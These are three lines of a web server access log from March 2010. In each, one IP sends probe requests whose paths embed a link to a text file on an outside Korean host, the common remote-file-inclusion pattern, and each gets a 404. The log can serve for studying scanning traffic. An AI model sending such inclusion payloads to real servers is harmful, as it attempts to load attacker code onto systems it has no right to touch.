116.127.121.117 - - [03/Mar/2010:06:43:24 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:24 -0800] "GET /logs///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:24 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
